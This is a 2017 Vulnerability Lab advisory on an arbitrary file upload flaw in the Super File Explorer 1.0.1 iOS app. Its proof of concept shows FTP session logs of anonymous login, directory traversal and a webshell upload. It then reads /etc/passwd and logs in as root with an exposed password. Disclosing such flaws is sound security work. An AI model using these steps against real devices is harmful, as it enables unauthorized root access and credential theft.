Super File Explorer 1.0.1 Arbitrary File Upload

Super File Explorer version 1.0.1 suffers from a remote file upload vulnerability.


MD5 | 5f23657a5aa3b3409ab8d8f69ec13b41

Document Title:
===============
Super File Explorer 1.0.1 - Arbitrary File Upload Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2034


Release Date:
=============
2017-02-23


Vulnerability Laboratory ID (VL-ID):
====================================
2034


Common Vulnerability Scoring System:
====================================
7


Product & Service Introduction:
===============================
This app is a file manager and viewer. For iPhone, iPod touch, and iPad. Copy, paste, rename, and move files. Integrates with
AttachmentSaver, Safari Download Manager. Dynamic file sharing folder of iTunes. Manage files in your Dropbox, SugarSync,
etc. Send files as email attachments. View and download email attachments. Full screen file viewer.

(COpy of the Homepage: https://itunes.apple.com/de/app/super-file-explorer-file-viewer-file-manager/id1101973946 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a vulnerability in the Super File Explorer v1.0.1 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2017-02-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LZX Apps
Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Super File Explorer v1.0.1 iOS mobile application.
The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service.

The vulnerability is located in the developer path that is accessable and hidden within next to the root path.
Remote attackers are able to upload malicious files like webshells to the developer path to access within a next
step the `/etc/passwd` file of the ftp service. Thus allows the attacker to gain finally access to the root access
credentials of the ftp application to compromise the service or mobile device. The permission rights within the
developer path allows an attacker to gain access to the passwd files and other sensitive data.

By default there is no password setup for the ftp or web ui account. Attackers can for example access the ftp via console
to upload a local file to the developer path. After that the attacker can remotly access the at same time activated ftp
web ui service to execute the file. Then the attacker downloads the passwd file and can login with the ftp root credentials
to the service.

The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0.
Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction.
Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.


Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without privilege application
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the vulnerable mobile ios application to your test idevice (iphone)
2. Start the mobile device software
3. Start the ftp and web-server via remote manager button push
4. Open the ftp via console and login as random user with any credentials
5. Move to the developer path in the upper folder
6. Upload of a remote system or the local system path via network a webshell
7. Open ftp web ui url (http://localhost) and move to the developer path
8. Open the webshell and request via GET the "/etc/passwd" file that is accessable
9. Login again to the ftp server using the root:smx7MYTQIi2M
10. Successful root access to compromise the ftp server and mobile via arbitrary file upload vulnerability!


FTP WEB UI URL:
http://localhost

FTP SERVER URL:
locahost:2121


--- PoC Exploitation ---
C:UsersAdmin>ftp
ftp> open 192.168.2.241 2121
Verbindung mit 192.168.2.241 wurde hergestellt.
220 iosFtp server ready.
502 Unknown command 'UTF8'
Benutzer (192.168.2.241:(none)): anonymous
331 Password required for anonymous
Kennwort: a@b.com
230 User anonymous logged in.
ftp> cd ..
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 3
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents
drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library
drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp
226 Transfer complete.
FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s
ftp> cd /../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 13
---------- 1 (null) (null) 0 (null) Applications
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer
---------- 1 (null) (null) 0 (null) Library
---------- 1 (null) (null) 0 (null) System
---------- 1 (null) (null) 0 (null) bin
---------- 1 (null) (null) 0 (null) cores
---------- 1 (null) (null) 0 (null) dev
---------- 1 (null) (null) 0 (null) etc
---------- 1 (null) (null) 0 (null) private
---------- 1 (null) (null) 0 (null) sbin
---------- 1 (null) (null) 0 (null) tmp
---------- 1 (null) (null) 0 (null) usr
---------- 1 (null) (null) 0 (null) var
226 Transfer complete.
ftp> help
Befehle kAPnnen abgekA1/4rzt werden. Befehle sind:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp> mget
Remotedateien server/path/files/webshell
FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s
ftp> put
Lokale Datei webshell
Remotedatei /Developers/
-
Note: Now, open the web interface and surf on the ftp web ui to the webshell in the developer path
which owns user executable rights in the root path. Open the download module and insert the following
value "get /etc/passwd". The passwd file is tranfered with the following accounts ...
-
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
-
Now login as root via system administrator account and move to the root path of the application to improve the permission.
-
ftp> open 192.168.2.241 2121
Verbindung mit 192.168.2.241 wurde hergestellt.
220 iosFtp server ready.
502 Unknown command 'UTF8'
Benutzer (192.168.2.241:(none)): root
331 Password required for root
Kennwort: smx7MYTQIi2M
230 User root logged in.
ftp> cd /../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 13
drwxrwxr-x 1 root admin 0 (null) Applications
drwxrwxr-x 1 root admin 68 May 29 23:45 Developer
drwxrwxr-x 1 root admin 0 (null) Library
drwxrwxr-x 1 root admin 0 (null) System
drwxrwxr-x 1 root admin 0 (null) bin
drwxrwxr-x 1 root admin 0 (null) cores
drwxrwxr-x 1 root admin 0 (null) dev
drwxrwxr-x 1 root admin 0 (null) etc
drwxrwxr-x 1 root admin 0 (null) private
drwxrwxr-x 1 root admin 0 (null) sbin
drwxrwxr-x 1 root admin 0 (null) tmp
drwxrwxr-x 1 root admin 0 (null) usr
drwxrwxr-x 1 root admin 0 (null) var
226 Transfer complete.
FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s
ftp> get /etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '/etc/passwd'.
226 Transfer complete.
FTP: 1323 Bytes empfangen in 0.00Sekunden 1323000.00KB/s


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a change of the root credentials, in combination with the setup of secure access permission
rights for the web ui in the developer path. Disallow to use /../ to request the static root path as developer without permission.


Security Risk:
==============
The security risk of the arbitrary file upload vulnerability in the mobile ftp application is estimated as high. (CVSS 7.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Related Posts

Comments